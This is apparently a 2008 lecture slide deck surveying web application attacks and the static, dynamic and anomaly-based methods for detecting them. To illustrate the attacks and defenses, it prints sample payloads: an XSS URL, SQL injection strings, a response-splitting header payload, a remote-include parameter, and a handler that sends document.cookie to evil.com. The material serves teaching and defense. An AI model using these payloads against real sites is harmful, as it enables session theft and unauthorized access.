1. Vulnerability Analysis of Web-based Applications (Dec. 18, 2008)
This technical clue partly explains why we need to do protocol parsing for Internet traffic.
2. Outline
Current web security trend
Web Technologies
Web based attacks
Vulnerability Analysis
Conclusion
3. Web security
As the use of web applications for critical services has increased, attacks against the web have grown as well. A series of characteristics make web applications a valuable target for an attacker:
Web applications are often designed to be widely accessible
Web applications often interface with back-end components containing sensitive data
The most popular web languages are currently easy enough to allow novices to start writing their own applications
As the use of web applications for critical services has increased, the number and sophistication of attacks against web applications has grown as well.
A series of characteristics of web-based applications make them a valuable target for an attacker.
First, web applications are often designed to be widely accessible: they are almost always reachable through firewalls, and a significant part of their functionality is available to anonymous users.
Second, web-based applications often interface with back-end components, such as mainframes and product databases, that might contain sensitive data, such as credit card information.
Third, some of the most popular languages used to develop web-based applications are currently easy enough to allow novices to start writing their own applications.
4. Trend
In the first half of 2005, Symantec cataloged 1,100 new vulnerabilities affecting web-based applications, which represent well over half of all new vulnerabilities.
5. Outline
Current web security trend
Web technologies
Web based attacks
Vulnerability Analysis
Conclusion
6. Common Gateway Interface
One of the first mechanisms that enabled dynamic content: the Common Gateway Interface (CGI)
It defines a mechanism that a server can use to interact with external applications.
Disadvantage: a new process must be created and executed for each request
Server-specific APIs:
They have a low initialization cost and can perform more general functions than CGI-based programs.
They make writing a program more complex, since it involves some knowledge of the server's inner workings.
CGI programs can be written in virtually any programming language and executed by virtually all web servers (a minimal CGI-style sketch follows).
The use of a separate process for each request limits the maximum number of requests that can be satisfied at the same time, which is bounded by the maximum number of processes allowed by the OS.
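To make the CGI model concrete, here is a minimal CGI-style sketch; PHP is used only for consistency with the rest of the talk, and the parameter name is hypothetical. The server spawns a process per request and passes the request data in environment variables such as QUERY_STRING.
<?php
// Minimal CGI-style script (sketch): read the query string from the environment,
// parse it, and emit an HTML response.
$query = (string) getenv('QUERY_STRING');    // e.g. "name=Alice"
$params = array();
parse_str($query, $params);                  // "a=1&b=2" -> associative array
$name = isset($params['name']) ? $params['name'] : 'world';
header('Content-Type: text/html');
echo "<html><body>Hello, " . htmlspecialchars($name) . "</body></html>";
?>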
8. Embedded Web Application Frameworks
Today, most web application implementations take a middle way between the original CGI mechanism and server-specific APIs.
A framework provides an interpreter or compiler for the language used to encode the application's components, and it defines rules that govern the interaction between the server and the application's components.
Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python (interpreted, object-oriented, loosely typed).
These are high-level languages which are generally interpreted, provide support for object-oriented programming, and are loosely typed.
These characteristics simplify the development of small components.
9. A sample PHP program
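The slide's listing is an image and is not reproduced here; a minimal PHP page of the kind such slides typically show (a hypothetical sketch, with the parameter name chosen for illustration) reads a request parameter and embeds it in the generated HTML:
<?php
// Hypothetical sample PHP program: dynamic content driven by a request parameter.
$name = isset($_GET['name']) ? $_GET['name'] : 'guest';
echo "<html><body>";
echo "<h1>Hello, " . $name . "</h1>";   // note: output is not escaped, a recurring theme of this talk
echo "</body></html>";
?>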
10. Outline
Current web security trend
Web technologies
Web based attacks
Vulnerability Analysis
Conclusion
11. Attacks Web-based applications have fallen prey to a variety of different attacks that violate different security properties.
This survey focuses on attacks that make an application behave in unforeseen ways in order to disclose sensitive information or execute commands on behalf of the attacker.
Currently, most attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation.
12. Interpreter Injection Many dynamic languages include functions to dynamically compose and interpret code.
include and require - Includes and evaluates a file as PHP code.
eval, preg_replace (with the /e modifier) - Evaluate a string as PHP code.
exec, passthru, system, shell_exec, popen, pcntl_exec, proc_open and the backtick operator - Execute their input as a shell command.
These functions enable attacks on the server.
13. Sample of interpreter injection in Double Choco Latte
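The slide's code is an image and is not reproduced here. The general pattern behind this class of bug is a request parameter reaching eval(); the following is a hypothetical, simplified sketch of that pattern, not the actual Double Choco Latte code:
<?php
// Interpreter injection (sketch): user-controlled data is evaluated as PHP.
$action = $_GET['action'];   // e.g. action=phpinfo();
eval($action);               // the attacker-supplied string is executed on the server
?>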
14. Filename Injection
Most web languages allow an application to dynamically include files, either to interpret their content or to present them to users.
For example, to generate different page content depending on the user's preferences, such as for internationalization purposes.
Because PHP allows the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker's control.
15. A filename injection vulnerability in txtForum
In txtForum, pages are divided into parts, e.g., header, footer, and forum view, and can be customized by using different "skins," which are different combinations of colors, fonts, and other presentation parameters.
A skin parameter with value http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl, as sketched below.
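A hypothetical, simplified sketch of the underlying pattern (not the actual txtForum code): the skin path comes from user-controlled data and is passed to include().
<?php
// Filename (remote file) injection sketch.
$skin = $_GET['skin'];             // e.g. skin=http://[attacker-site]
include($skin . '/header.tpl');    // with remote inclusion enabled in the PHP configuration,
                                   // the attacker's header.tpl is fetched and executed as PHP
?>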
16. Cross-site scripting (XSS)
In this attack, an attacker forces a client, typically a web browser, to execute attacker-supplied code, typically JavaScript, which runs in the context of a trusted web site (the server-side flaw is sketched below the sample URL).
Sample:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
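A hypothetical sketch of the server-side flaw behind the URL above (the slide's welcome.cgi is not shown; any language that echoes input unescaped has the same problem):
<?php
// Reflected XSS sketch: the name parameter is echoed into the page verbatim,
// so a <script>...</script> value is executed by the victim's browser.
$name = $_GET['name'];
echo "<h1>Welcome, " . $name . "</h1>";
?>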
17. Impact of XSS-Attacks Access to authentication credentials for Web application
Cookies, Username and Password
XSS is not a harmless flaw!
Normal users
Access to personal data (Credit card, Bank Account)
Access to business data (Bid details, construction details)
Misuse of the account (e.g., order expensive goods)
High privileged users
Control over Web application
Control/Access: Web server machine
Control/Access: Backend / Database systems
18. SQL Injection A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation.
This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application.
$activate = $_GET["activate"];
$result = dbquery("SELECT * FROM new_users " .
                  "WHERE user_code='$activate'");
19. SQL Injection (example)
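The slide's example is an image; a sketch of how the query from the previous slide can be subverted (the attack value is chosen here for illustration):
<?php
// Suppose the request is  ...?activate=' OR ''='
$activate = "' OR ''='";   // attacker-supplied value of the activate parameter
$query = "SELECT * FROM new_users WHERE user_code='$activate'";
// The query becomes:
//   SELECT * FROM new_users WHERE user_code='' OR ''=''
// which matches every row of new_users instead of a single activation record.
?>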
20. Session Hijacking
HTTP is a stateless protocol: no built-in mechanism allows an application to maintain state throughout a session.
The session state can be maintained in different ways.
It can be encoded in a document transmitted to the user, such as a cookie or HTML hidden form fields, and sent back as part of later requests.
Problem: the cookie or hidden fields may be changed by dishonest users.
each user is assigned a unique session ID
Problem: Session fixation
However, all non-trivial applications need a way to correlate the current request with the history of previous requests.
21. Session Hijacking Session fixation: the attacker sets a user's session id to one known to him,
for example by sending the user an email with a link that contains a particular session id.
http://[target]/login.php?sessionid=1234
The attacker now only has to wait until the user logs in (a sketch of the vulnerable pattern follows).
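A hypothetical sketch of a fixation-prone login script (not taken from a specific application): the application adopts whatever session id the request supplies instead of issuing a fresh one.
<?php
// Session fixation sketch.
if (isset($_GET['sessionid'])) {
    session_id($_GET['sessionid']);   // the attacker-chosen id (e.g. 1234) becomes the session id
}
session_start();
// ...credential check here. Once the victim logs in, the attacker, who already knows the id,
// shares the authenticated session. Calling session_regenerate_id(true) after login prevents this.
?>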
22. Response Splitting
The attacker is able to set the value of an HTTP header field, and the resulting response stream is interpreted by the attack target as two responses.
To perform response splitting, the attacker must be able to inject data containing the header termination characters and the beginning of a second header.
This is usually possible when user data is used (unsanitized) to determine the value of an HTTP header.
23. Response Splitting
<% response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang")); %>
The normal response contains the header: Location: http://vulnerable.com/by_lang.jsp?lang=en_US
However, if lang is set to:
dummy%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>New document</html>
the response stream is split into two responses (decoded below).
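Decoded, the injected value makes the single redirect look like two messages on the wire, roughly as follows (a sketch; the exact status line and remaining headers depend on the server, and the Content-Length values are those carried in the injected payload):
HTTP/1.1 302 Moved Temporarily
Location: http://vulnerable.com/by_lang.jsp?lang=dummy
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>New document</html>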
24. Response Splitting
Response splitting is often related to web cache poisoning.
If two conditions hold:
a caching proxy server interprets the response stream as containing two documents, and
it associates the second one with the original request,
then the attacker is able to insert into the proxy's cache a page of his choice in association with a URL of the vulnerable application.
25. Outline
Current web security trend
Web technologies
Web based attacks
Vulnerability Analysis
Conclusion
26. Vulnerability analysis
Vulnerability analysis refers to the process of assessing the security of an application by auditing either its code or its behavior for possible security problems.
The identification of vulnerabilities in web applications can be performed following one of two orthogonal detection approaches: the negative (vulnerability-based) approach and the positive (behavior-based) approach.
27. Detection approach
Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications to identify instances of the modeled vulnerabilities.
Positive approach: builds models of the normal behavior of an application (e.g., using machine-learning techniques) and then analyzes the application behavior to identify any abnormality that might be caused by a security violation.
Two fundamental techniques can be used to perform the analysis: static analysis and dynamic analysis.
28. Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. It does not require the application to be deployed and executed.
Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run time.
Since the analysis is done on a "live" application, it is less prone to false positives. However, it can suffer from false negatives, since only a subset of possible input values is usually processed by the application and not all vulnerable execution paths are exercised.
In practice, hybrid approaches that mix static and dynamic techniques are frequently used to combine the strengths and minimize the limitations of the two approaches.
29. Outline
Current web security trend
Web Technologies
Web based attacks
Vulnerability Analysis
Negative approach
Positive approach
Conclusion
30. Negative approach: taint propagation
Most negative approaches assume that vulnerabilities are the result of insecure data flow in applications.
The goal is to identify when untrusted user input propagates to security-critical functions (sinks) without being properly checked and sanitized.
Taint propagation: data from untrusted input is marked as tainted, and its propagation throughout the program is traced to check whether it can reach sinks (a small illustration follows).
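As a concrete, hypothetical illustration of the source / sanitizer / sink terminology:
<?php
$id = $_GET['id'];                 // source: attacker-controlled, marked tainted

echo "Item " . $id;                // sink reached with tainted data: reported as a flaw

$safe = htmlspecialchars($id);     // sanitizer: the result is considered untainted
echo "Item " . $safe;              // sink reached with untainted data: not reported
?>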
31. Negative static approaches
Static analysis can be applied before deployment and does not require modification of the deployment environment.
Current tools focus on the analysis of applications written in PHP and Java.
They may require the source code of the web application to perform the analysis.
Static analysis usually does not require modification of the deployment environment, which might introduce overhead and also pose a threat to the stability of the application.
Static analysis is especially suitable for the web application domain, where the deployment of vulnerable applications or the execution in an unstable environment can result in a substantial business cost.
32. WebSSARI (WWW’04) WebSSARI (WWW’04) is one of the first works that applies taint propagation analysis in web security.
WebSSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection.
The tool uses flow-sensitive, intra-procedural analysis based on a lattice model and typestate.
Typestate: PHP's type system is extended with two types, tainted and untainted, and the tool keeps track of the typestate of variables.
In order to untaint tainted data, the data has to be processed by a sanitization routine or cast to a safe type.
33. WebSSARI predefines three files:
a file with preconditions for all sensitive functions (the sinks)
a file with known sanitization functions, used for untainting
a file specifying all possible sources of untrusted input
When the tool finds that tainted data reaches a sink, it automatically inserts sanitization routines.
34. Typestate example
If (A) {
    A = X;        // A takes X's typestate
} else {
    if (B) {
        A = Y;    // A takes Y's typestate
    } else {
        A = Z;    // A takes Z's typestate
    }
}
Echo (A);         // sink: A is tainted here if any of X, Y, Z was tainted
At the join point after the branches, the analysis merges the typestates and keeps the least safe one (tainted wins).
36. Runtime Protection
Different sanitization routines are automatically inserted just before vulnerable function calls
Depending on the vulnerable function, one of the three following routines is inserted (a sketch follows the list):
HTML output sanitization
Database command sanitization
System command sanitization
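A hedged sketch of what such an automatic insertion amounts to (hypothetical, not WebSSARI's actual output):
<?php
echo $_GET['msg'];                                 // before: tainted data reaches an HTML output sink

echo htmlspecialchars($_GET['msg'], ENT_QUOTES);   // after: HTML output sanitization inserted before the sink
// For database sinks a routine in the spirit of addslashes() would be inserted,
// and for system-command sinks one like escapeshellarg().
?>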
37. System Implementation
38. Problems of WebSSARI:
It uses an intra-procedural algorithm and thus only models information flow that does not cross function boundaries. (Xie & Aiken, USENIX Security '06)
All dynamic variables and arrays are considered tainted, which reduces the accuracy of the analysis.
It cannot accurately track arrays, aliases, and object-oriented code. (Pixy, IEEE S&P/Oakland '06)
39. Summary
Static analysis heavily depends on language-specific parsers. This is generally not a problem for general-purpose languages,
but web applications use dynamic scripting languages whose complex data structures, such as arrays and hashes, are hard to track.
One of the main drawbacks of static analysis is its susceptibility to false positives caused by inevitable analysis imprecision.
Precise evaluation of sanitization routines is even more difficult: checking against a regular expression may not be enough.
40. Dynamic negative approach
Dynamic negative techniques are also based on taint analysis: untrusted sources, sensitive sinks, and taint propagation still need to be modeled.
Instead of analyzing the source code, the program or the interpreter is extended to collect the information, and tainted data is tracked during execution.
Perl's taint mode: when the Perl interpreter is invoked with the -T option, it makes sure that no data obtained from the outside environment can be used in security-critical functions (too conservative).
41. "Automatically Hardening Web Applications Using Precise Tainting", SEC '05: proposes a modification of the PHP interpreter to dynamically track tainted data in PHP programs.
Fully automated
Aware of application semantics
Replace PHP interpreter with a modified interpreter that:
Keeps track of which information comes from untrusted sources (precise tainting)
Checks how untrusted input is used
43. Coarse Grain Tainting Provided by many scripting languages (Perl, Ruby)
Untrusted input is tainted
Everything touched by tainted data becomes tainted:
$query = "SELECT real_name FROM users WHERE user = '" . $user . "' AND pwd = '" . $pwd . "'";
The entire $query string is tainted.
44. Precise Tainting
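The slide's illustration is not reproduced; as a hypothetical annotation, the difference from the coarse-grained scheme above is that only the characters copied from user input are marked:
<?php
//   $query = "SELECT real_name FROM users WHERE user = 'alice' AND pwd = 's3cret'";
// Precise tainting marks only the characters copied from $user ('alice') and $pwd ('s3cret')
// as tainted; the SQL text written by the programmer stays untainted, so later checks can
// tell attacker-supplied text from application text inside the same string.
?>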
45. Precise Checking Wrappers around PHP functions that handle updating and checking precise taint information
Conservative: no false negatives while minimizing false positives
Behavior only changes when an attack is likely
46. Preventing SQL Injection Parse the query using the SQL parser: identify interpreted text
Disallow SQL keywords or delimiters in interpreted text that is tainted
The query is not sent to the database
An error response is returned
Example of a rejected query (SQL keywords and delimiters appear inside tainted text):
SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ' AND pwd = ''
47. Preventing PHP Injection Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state
Place wrappers around these functions to enforce this rule
A phpBB attack is prevented by the wrapper around preg_replace
48. Preventing Cross Site Scripting Wrappers around output functions
Buffer output and then parse the tainted output with HTML Tidy
The defense takes advantage of precise tainting information to identify web page output generated from untrusted sources.
Dangerous content is determined by examining the HTML grammar
It is sanitized by removing tags
<b>Hello</b> → Safe
<b onmouseover='location.href="http://evil.com/steal.php?" + document.cookie'>Hello</b> → Unsafe
49. Summary of the dynamic negative method
A modified interpreter can be applied to all web applications. Even more important, no complex analysis framework for features such as alias analysis is required, because all the required information is available as the result of program execution.
However, there is no guarantee that all cases are covered.
50. Summary of the negative method
If taint propagation is done statically, the precision highly depends on the ability to deal with the complexities of dynamic language features. Precise evaluation of sanitization routines is especially important.
If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability, and performance arise.
51. Outline
Current web security trend
Web Technologies
Web based attacks.
Vulnerability Analysis
Negative approach
Positive approach
Conclusion
52. Positive Approaches Based on deriving models of the “normal” behavior
Assumption:
Deviations mean attacks or vulnerabilities;
attacks create an anomalous manifestation;
An anomaly detection system utilizes a number of statistical models to identify anomalous events in a set of web requests that use parameters to pass values to the server-side components of a web-based application.
53. Anomaly-based detection
Based on the assumption that normal traffic can be defined
Attack patterns will differ from such 'normal' traffic
An anomaly-based detection system goes through a learning phase to register such 'normal' traffic
Analysis is done for individual field attributes as well as for the entire query string
The difference should be expressible quantitatively
54. Anomaly Detection of Web-based Attacks, Christopher Kruegel & Giovanni Vigna, CCS '03
It is hard to keep intrusion detection signature sets updated with respect to the large numbers of vulnerabilities discovered daily.
This paper presents an intrusion detection system that uses a number of different anomaly detection techniques to detect attacks against web servers and web-based applications.
The anomaly detection system takes as input the web server log files which conform to the Common Log Format and produces an anomaly score for each web request.
55. Data Model
Only GET requests are considered; headers are not analyzed
169.229.60.105 - johndoe [06/Nov/2002:23:59:59 -0800] "GET /scripts/access.pl?user=johndoe&cred=admin" 200 2122
Only the query string is modeled, not the path
For a query q, the attribute set is Sq = {a1, a2} (here: user and cred)
56. Detection model Each model is associated with weight wm.
Each model returns the probability pm.
A value of pm close to 0 indicates an anomalous event.
If the weighted score (recalled below) is greater than the detection threshold determined during the learning phase for that parameter, the anomaly detector considers the entire request anomalous and raises an alert.
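Recalling the combination used (a sketch; wm and pm as defined above, summed over the models applied to a parameter):
\[ \text{AnomalyScore} = \sum_{m \in \text{Models}} w_m \cdot (1 - p_m) \]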
57. Anomaly-based Some of the attributes that could be analyzed are:
Input length
Character distribution
Parameter string structure
Parameter absence or presence
Order of parameters
58. Attribute Length Normal Parameters
Fixed sized tokens (session identifiers)
Short strings (input from HTML form)
So lengths do not vary much for parameters associated with a given program
Malicious activity
E.g., a buffer overflow payload typically requires an unusually long parameter
Goal: to approximate the actual but unknown distribution of the parameter lengths and detect deviation from the normal
59. Learning & Detection Learning
Calculate the mean and variance of the lengths l1, l2, ..., ln of the parameter values processed
(from the n queries that carry this attribute)
Detection
Chebyshev inequality
This bound is deliberately weak, resulting in a high degree of tolerance to variations (very weak)
Only obvious outliers are flagged as suspicious (the bound is recalled below)
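A sketch of the bound, with μ and σ² the learned mean and variance of the lengths and l the length observed at detection time; the model's return value is this bound, capped at 1:
\[ p(|x - \mu| > |l - \mu|) \le \frac{\sigma^2}{(l - \mu)^2} \]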
60. Attribute character distribution Attributes have regular structure, printable characters
There are similarities between the character frequencies of query parameters.
The relative character frequencies of the attribute are sorted in decreasing order
Normal parameters:
frequencies decrease slowly in value
Malicious parameters:
frequencies drop extremely fast (a peak caused by a single character dominating the distribution)
or hardly drop at all (random values)
61. Why is it useful?
It cannot be evaded by some well-known attempts to hide malicious code in the string,
e.g., nop operations substituted by instructions with similar behavior (add rA,rA,0).
But it is less useful when an attack causes only a small change in the payload's character distribution.
62. Learning and detection Learning
For each query attribute, its character distribution is stored
The ICD (idealized character distribution) is obtained by averaging all the stored character distributions
63. Learning and detection (cont...) Pearson chi-square test
It is not necessary to operate on all values of the ICD; a small number of intervals (bins) is considered
Calculate observed and expected frequencies
Oi = observed frequency of each bin
Ei = expected frequency: the relative frequency of each bin (from the ICD) multiplied by the length of the attribute
Compute the chi-square value (see below)
Derive the corresponding probability from a predefined chi-square table
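The test statistic is the standard Pearson chi-square value over the bins (Oi and Ei as defined above):
\[ \chi^2 = \sum_{i} \frac{(O_i - E_i)^2}{E_i} \]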
64. Structural inference
The structure of a parameter is the regular grammar that describes all of its normal, legitimate values.
Why is this useful?
An attacker may craft an attack in a manner that makes its manifestation appear more regular;
for example, non-printable characters can be replaced by groups of printable characters.
65. Learning and detection
The basic approach is to generalize the grammar as long as it seems reasonable and to stop before too much structural information is lost.
Markov model and Bayesian probability
The grammar is represented as a non-deterministic finite automaton (NFA):
each state S has a set of ns possible output symbols o which are emitted with probability ps(o);
each transition t is marked with a probability p(t), the likelihood that the transition is taken (the resulting word probability is sketched below).
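In this model, the probability of a parameter value w is, in sketch form (using the p(t) and ps(o) notation above; the sum ranges over the paths through the automaton that emit w):
\[ p(w) = \sum_{\text{paths emitting } w} \; \prod_{i} p(t_i)\, p_{s_i}(o_i) \]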
66. Learning and detection (cont...)
67. Learning and detection (cont...)
68. Learning and detection (cont...)
The aim is to maximize the product of the probability of the model and the probability of the training data given the model.
There is a conflict between simple models that tend to over-generalize and models that perfectly fit the data but are too complex.
A simple model has a high probability, but its likelihood of producing the training data is extremely low, so the product is low.
A complex model has a low probability, but its likelihood of producing the training data is high; the product is still low.
The model is built up from the training data, and its states are then derived using the Viterbi algorithm.
69. Learning and detection (cont...) Detection
The problem is that even a legitimate input that has been regularly seen during the training phase may receive a very small probability value,
because the probability values of all possible input words sum to 1.
Therefore, the model returns 1 if the value can be derived from the given grammar (is a valid output), and 0 otherwise.
70. Token finder
Determines whether the values of an attribute are drawn from a limited set of possible alternatives (an enumeration).
When a malicious user passes illegal values to such a parameter, the attack can be detected.
71. Learning and detection Learning
Enumeration: the number of different parameter values observed is bounded by some threshold t
Random: the number of different argument instances grows proportionally with the total number of occurrences
A statistical correlation test between these two quantities decides between the two cases
72. Learning and detection (cont...) Detection
If the parameter is an enumeration and an unexpected value appears, the model returns 0, otherwise 1; if the parameter is random, it always returns 1.
73. Attribute presence or absence
Client-side programs, scripts, or HTML forms pre-process the data and transform it into a suitable request.
Hand-crafted attacks focus on exploiting a vulnerability in the code that processes a certain parameter value, and little attention is paid to the remaining parameters and their order.
74. Learning and detection Learning
Model of acceptable subsets
Record each distinct subset Sq = {ai, ..., ak} of attributes seen during the training phase.
Detection
The algorithm performs, for each query, a lookup of the current attribute set.
If the set was encountered during training, the model returns 1, otherwise 0.
75. Attribute order Legitimate invocations of server-side programs often contain the same parameters in the same order.
Hand-crafted attacks often do not.
The test checks whether the given order is consistent with the model deduced during the learning phase.
76. Learning and detection
Learning:
A set of attribute pairs O is built as follows:
each vertex vi in a directed graph G is associated with the corresponding attribute ai;
for every query, the ordered list of its attributes is processed;
for each attribute pair (as, at) in this list, with s ≠ t and 1 ≤ s, t ≤ i, a directed edge is inserted into the graph from vs to vt.
77. Learning and detection (cont...)
The graph G contains all order constraints imposed by queries in the training data.
An order constraint between two attributes is determined by
a directed edge, or
a path between the corresponding vertices
Detection
Given a query with attributes a1, a2, ..., ai and a set of order constraints O, all the parameter pairs (aj, ak) with j ≠ k and 1 ≤ j, k ≤ i are checked against O.
If a violation is found, the model returns 0, otherwise 1.
78. Conclusions of this paper
An anomaly-based intrusion detection system for the web.
It takes advantage of the application-specific correlation between server-side programs and the parameters used in their invocation.
Parameter characteristics are learned from the input data.
Tested on data from Google and from two universities, one in the US and one in Europe.
79. Summary positive approaches Advantage:
By specifying normal behavior, it can detect unknown attack
Problems:
the concept of normality is difficult to define
vulnerable to mimicry attacks; setting the detection threshold still requires manual intervention and substantial expertise
The creation of models that correctly characterize the behavior of an application still requires the use of ad hoc heuristics and manual work.
80. Outline
Current web security trend
Web based attacks
Vulnerability Analysis
Conclusion
81. Conclusion
No method can be considered "the silver bullet"; many methods combine strengths from various techniques.
It is important to provide techniques and tools to better model sanitization operations and to assess whether a sanitization operation is appropriate for the task at hand.
Challenges come from novel web-specific attack techniques; improper input validation vulnerabilities are well known and well studied.
There is no standard dataset usable as a baseline for evaluation: every tool is evaluated on a different set of applications, and a fair comparison of different approaches is not possible.
82. Our future work
To develop static and dynamic methods that specifically support the detection of XSS script code.
83. Thank you!